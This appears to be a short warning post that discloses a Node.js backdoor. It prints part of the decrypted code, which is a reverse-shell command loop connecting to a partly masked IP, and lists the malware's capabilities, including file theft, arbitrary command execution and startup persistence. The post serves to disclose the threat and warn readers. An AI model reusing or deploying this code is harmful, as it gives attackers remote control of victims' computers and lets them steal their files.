For security reasons, I will not disclose the full decryption process.
Only a small sample will be shown.
const fs = require('fs');
const net = require('net');
const { exec } = require('child_process');
(I hide IP for security reasons)
const HOST = '188.166.XXX.XXX';
const PORT = 8080;
} else if (cmd.startsWith('cd ')) {
try {
process.chdir(cmd.substring(3));
socket.write('Directory changed\n');
} catch (err) {
socket.write('Error: ' + err.message + '\n');
}
} else if (cmd.startsWith('get ')) {
const file = cmd.substring(4);
if (fs.existsSync(file)) {
const content = fs.readFileSync(file, 'utf8');
socket.write('FILE_START:' + file + '\n' + content + '\nFILE_END');
} else {
socket.write('File not found: ' + file + '\n');
}
} else if (cmd.startsWith('put ')) {
const parts = cmd.split('\n');
const fileName = parts[0].substring(4);
const content = parts.slice(1).join('\n');
fs.writeFileSync(fileName, content);
socket.write('File written: ' + fileName + '\n');
} else {
exec(cmd, (error, stdout, stderr) => {
socket.write(stdout || stderr || 'Command executed\n');
});
This is not one of the usual backdoors we have known so far.
It is extremely serious and must be reported to the Cyber Crime Unit.
This constitutes a cybercrime, and you need to pay close attention.
Below is an example of what it is capable of doing.
1.Connecting to a malicious server (Reverse Shell)
2.Executing arbitrary commands on your computer
3.Downloading/Uploading files
4.Collecting system information
5.Attempting to take screenshots
6.Adding to startup for permanent execution
7.Automatically reconnecting if connection is lost
